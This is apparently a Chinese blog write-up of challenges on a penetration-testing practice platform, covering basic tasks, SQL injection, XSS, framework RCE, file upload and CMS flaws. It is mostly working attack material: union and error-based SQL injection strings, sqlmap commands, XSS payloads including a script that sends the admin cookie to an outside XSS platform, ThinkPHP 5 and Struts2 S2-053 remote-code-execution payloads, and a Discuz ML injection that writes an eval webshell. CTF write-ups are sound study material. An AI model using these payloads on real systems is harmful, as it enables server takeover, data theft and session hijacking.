安鸾渗透实战平台wp(持续更新)

一、基础题

1.BurpSuite抓包
题目URL:http://www.whalwl.top:8007
打开网页,抓包重放,发送到repeter模块,题目提示说在头里面
在这里插入图片描述
在这里插入图片描述
2.kali系统安装
题目URL:http://www.whalwl.cn:8008/
直接有提示,访问readme.html直接出flag…
在这里插入图片描述
3.PHP代码练习
题目URL:http://www.whalwl.top:8022/

<?php
    $shell = "pwd";
    exec($shell, $result, $status);
    $shell = "<font color='red'>$shell</font>";
    echo "<pre>";
    if( $status ){
        echo "shell命令{$shell}执行失败";
    } else {
        echo "shell命令{$shell}成功执行, 结果如下<hr>";
        print_r( $result );
    }
    echo "</pre>";
?>

首先看是什么目录,在$shell = “”;输入pwd
在这里插入图片描述
然后提示说在根目录,但是cd不能用,用ls /查看
在这里插入图片描述
可以看到flag了,再用cat this_is_flag_d0a10f422fb92e1e6f9bc193a254ef4d.txt
在这里插入图片描述

二、SQL注入

  1. SQL数字型GET注入01
    漏洞URL:http://www.whalwl.top:8001/bug/sql_injection/sql_num.php
    1’报错,输入-1返回正常,构造payload,
    判断字段:显示位在第二位和第三位
-1 order by 3 #

在这里插入图片描述
爆库:

 -1 union select 1,database(),3 #

在这里插入图片描述
爆表:

-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'dwvs'#

在这里插入图片描述
爆字段:

-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='dwvs' and table_name='flag' #

在这里插入图片描述
爆数据:

-1 union select 1,flag,3 from dwvs.flag #

在这里插入图片描述

2.SQL字符型注入
漏洞URL:http://www.whalwl.top:8005//bug/sql_injection/sql_string.php?title=1&submit=submit
a’报错,输入a’ or 1=1 #返回正常,输入a’ or 1=2 #返回错误,构造payload
在这里插入图片描述
在这里插入图片描述
判断字段:显示位在第二位和第三位

a' order by 3 #

在这里插入图片描述
爆库:

 a' union select 1,database(),3 #

在这里插入图片描述
爆表:

a' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'dwvs'#

在这里插入图片描述
爆字段:

a' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='dwvs' and table_name='flag' #

在这里插入图片描述
爆数据:

a' union select 1,flag,3 from dwvs.flag #

在这里插入图片描述
3.SQL搜索型注入02
题目URL:http://www.whalwl.top:8015/login.php
提示本题有三个难度,默认是低
此题可手工注入也可自动注入
首先注册账号
在这里插入图片描述
然后登陆,点击电影搜索,然后输入1’抓包
在这里插入图片描述
丢进sqlmap一把梭
在这里插入图片描述
获得flag
在这里插入图片描述
手工注入:
判断字段:

%' order by 7 #

在这里插入图片描述
爆库:

%' union select 1,database(),3,4,5,6,7 #

在这里插入图片描述
爆表:

%' union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema = 'whalwl'#

在这里插入图片描述
爆字段:

%' union select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_schema='whalwl' and table_name='this_flag' #

在这里插入图片描述
爆数据:

%' union select 1,flag,3,4,5,6,7 from whalwl.this_flag #

在这里插入图片描述
4.SQL数字型GET注入02
题目URL:http://whalwl.site:8034/
url加一’报错,直接sqlmap一把梭
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
5.Cookie注入
题目URL:http://www.whalwl.top:8009
sqlmap一把梭

sqlmap -u "http://www.whalwl.top:8009/user.php?id=1" --cookie "id=1" --dbs --level 2

在这里插入图片描述
6.X-Forwarded-For注入
题目URL:http://www.whalwl.top:8010
打开页面,burp开启抓包,刷新页面,添加X-Forwarded-For:127.0.0.1*
在这里插入图片描述
丢进sqlmap一把梭
在这里插入图片描述
在这里插入图片描述
7.SQL搜索型盲注
漏洞URL:http://www.whalwl.top:8002/search.php
判断字段数,大于5会报错,存在5个字段

a' order by 5 #	

在这里插入图片描述
爆库:

a' union select 1,database(),3,4,5 #

在这里插入图片描述
爆表:

a' union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema = 'dwvs'#

在这里插入图片描述
爆字段:

a' union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema='dwvs' and table_name='flag' #

在这里插入图片描述
爆数据:

a' union select 1,flag,3,4,5 from dwvs.flag #

在这里插入图片描述
8.POST盲注&万能密码
登陆处抓包,sqlmap一把梭,sql
在这里插入图片描述
8.SQL报错型注入
首先注册登陆,然后修改个人信息
爆库:

admin' and updatexml(1,concat(0x7e,(select database()),0x7e),1) #

在这里插入图片描述
在这里插入图片描述
爆表:

admin' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='dwvs'),0x7e),1) #

在这里插入图片描述
爆数据:

admin' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='dwvs' and table_name='flag'),0x7e),1) #

在这里插入图片描述
爆数据:

admin' and updatexml(1,concat(0x7e,(select group_concat(flag) from dwvs.flag),0x7e),1) # 

在这里插入图片描述
9.宽字符注入
题目URL:http://www.whalwl.top:8011
自动注入:sqlmap -u “http://www.whalwl.top:8011/wide.php?id=1” --tamper unmagicquotes --dbs
在这里插入图片描述
判断字段数,5以后报错,说明只有5个字段

?id=1%aa' order by 2 %23 

在这里插入图片描述
爆库:

?id=999%aa' union select 1,database(),3,4,5 %23

在这里插入图片描述
爆表:可以把数据库名转换为16进制,也可以直接等于database()

?id=999%aa' union select 1,group_concat(table_name) from information_schema.tables where table_schema = database() %23

在这里插入图片描述
爆字段:把this_flag转成16进制

?id=999%aa' union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name = 0x746869735f666c6167 %23

在这里插入图片描述
爆数据:

?id=999%aa' union select 1,flag,3,4,5 from kzf.this_flag %23

在这里插入图片描述
10.DNSlog方式注入
题目URL:http://www.zhanluanjie.win:10020

11.宽字符注入02
网站URL:http://whalwl.site:8036/

12.SOAP协议注入
题目URL:http://www.whalwl.top:8018/

13.安全狗绕过(SQL注入)
题目URL:http://www.zhanluanjie.win:10021

三、xss

1.存储型XSS
网站URL:http://www.whalwl.top:8006
提示:flag在cookie里面,注意格式flag{…}
首先注册一个账号并登陆
在这里插入图片描述
然后去留言板留言,没有任何过滤,直接

<img src="x" onerror="alert(document.cookie);">
或者
<svg/onload = alert(document.cookie);>

在这里插入图片描述
2.XSS挖掘&绕过
题目URL:http://www.zhanluanjie.win:10020/xss/
提示:
1、flag在管理员admin的后台管理中心里面
2、管理员每隔5分钟上线一次哦
首先注册账号并登陆
在这里插入图片描述
然后发布帖子,内容就是xss平台的连接
<sCRiPt/SrC=//https://xss8.cc/JOAc>
在这里插入图片描述
接着就是等待管理员的cookie,然后替换cookie登陆获取flag

三、开发框架漏洞

1.ThinkPHP5.0.23 远程代码执行漏洞
题目URL:http://www.whalwl.cn:8031
题目已经说了是thinkphp5.0.23,直接网上搜索payload
get传参:?s=captcha
post传参:_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=cat /this_is_flag
在这里插入图片描述
在这里插入图片描述
2.Thinkphp5.0.22/5.1.29远程代码执行漏洞
题目URL:http://www.whalwl.cn:8032
题目已经说了是thinkphp5.0.22/5.1.29,直接网上搜索payload

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
3.struts2远程命令执行
漏洞编号:S2-053
CVE编号:CVE-2017-12611
题目URL:http://www.whalwl.cn:8027/hello.action
poc为

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=‘ls’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd=‘ls’}:{’/bin/bash’,’-c’,#cmd})).(#p=new
java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

特别注意,分析上述代码,可以发现其中我们要执行的任意代码位于以下两处。

(#cmd='ls /')
{'cmd.exe','/c',#cmd='ls /'}

在这里插入图片描述
在这里插入图片描述

四、经典CVE系列

1.Nginx整数溢出漏洞
2.破壳漏洞
CVE编号:CVE-2014-6271
题目URL:http://www.whalwl.cn:8029/
直接下载poc秒

五、文件上传

1.Nginx解析漏洞
题目URL:http://www.whalwl.top:8020/
提示:flag在网站根目录下
2.文件上传01
题目URL:http://www.whalwl.cn:8024/
提示:flag在网站根目录下
3.webshell&中国菜刀
题目URL:http://www.whalwl.site:8013
提示:flag仍然在数据库里面哦!
打开页面发现一句话木马连接地址,蚁剑连接,发现是真的,然后提示发现init.php,打开是数据库配置文件,得知账号和密码
在这里插入图片描述
然后用蚁剑的数据管理连接,这里注意的是地址要改成Mysql,这里是一个坑
在这里插入图片描述
连接成功之后,找到flag存在的表
在这里插入图片描述

六、CMS系列

1.Discuz
题目URL:http://whalwl.host:8042/forum.php
漏洞描述:
Discuz ML! V3.X存在代码注入漏洞,攻击者通过精心构建的请求报文可以直接执行恶意的PHP代码,进一步可获取整个网站的服务器权限。
漏洞影响版本:Discuz!ML v.3.4 、Discuz!ML v.3.2 、Discuz!ML v.3.3 product of codersclub.org
(注意:支持多语言切换可能会有这个漏洞!)
首先打开burp 刷新首页抓包,然后将抓到的包发送到Repeater中
在这里插入图片描述
构造请求参数验证漏洞是否存在
在这里插入图片描述
利用Cookie信息上传Shell

因为cookie字段中language没有对参数进行过滤直接拼接从而写入缓存文件之中,导致缓存文件随后被加载,从而造成代码执行。我们可以使用file_put_contents() 函数写入一句话木马

'.file_put_contents('owl.php',urldecode('<?php eval($_POST["owl"]);?>')).'

经过URL编码后为

%27.file_put_contents%28%27owl.php%27%2Curldecode%28%27%253c%253fphp%2520eval%28%2524_%2550%254F%2553%2554%255b%2522owl%2522%255d%29%253b%253f%253e%27%29%29.%27

在这里插入图片描述
由上图可见,服务器状态返回正常
使用AntSword、Chopper或者Behinder进行连接,这里使用的是AntSword
路径是http://whalwl.site:8042/owl.php
在这里插入图片描述

  • 0
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
有道云笔记是一款文件管理和云存储平台,用户可以将各种文件上传至云端进行保存和管理。针对有道云笔记的渗透测试的文件上传核题,主要是测试目标是否存在文件上传漏洞。 文件上传漏洞是指攻击者通过上传恶意文件或者利用上传功能绕过限制,成功在目标服务器上执行任意代码或者获取未授权的访问权限。攻击者可通过上传特定类型的文件,利用后台执行逻辑漏洞或者文件解析漏洞,从而实现对目标系统的攻击或控制。 针对有道云笔记的文件上传漏洞,常见的测试方法包括: 1. 尝试上传各种类型的文件:测试能否上传系统可执行文件、脚本文件或者危险的文件类型。 2. 绕过后台验证:尝试修改请求报文、绕过文件类型检查、篡改上传文件路径等,测试服务器是否能正确地执行上传操作的检查。 3. 文件解析漏洞测试:测试上传的文件是否能够被服务器直接解析,并且触发对应的解析漏洞。 4. 文件重命名与遍历:测试能否修改上传文件的文件名,并尝试通过../等目录遍历操作访问到其他敏感文件。 针对发现的漏洞和问题,需要将测试结果整理成详细的渗透测试报告,包括漏洞描述、危害程度评估和修复建议等。然后与有道云笔记的开发团队和管理员进行沟通,提供测试结果和修复建议,并跟踪漏洞修复进展。 及时发现和修复文件上传漏洞,对于保护用户数据和防止潜在的攻击十分重要。因此,有道云笔记应该充分重视渗透测试的文件上传核题,加强安全意识和漏洞修复的流程,确保用户数据的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值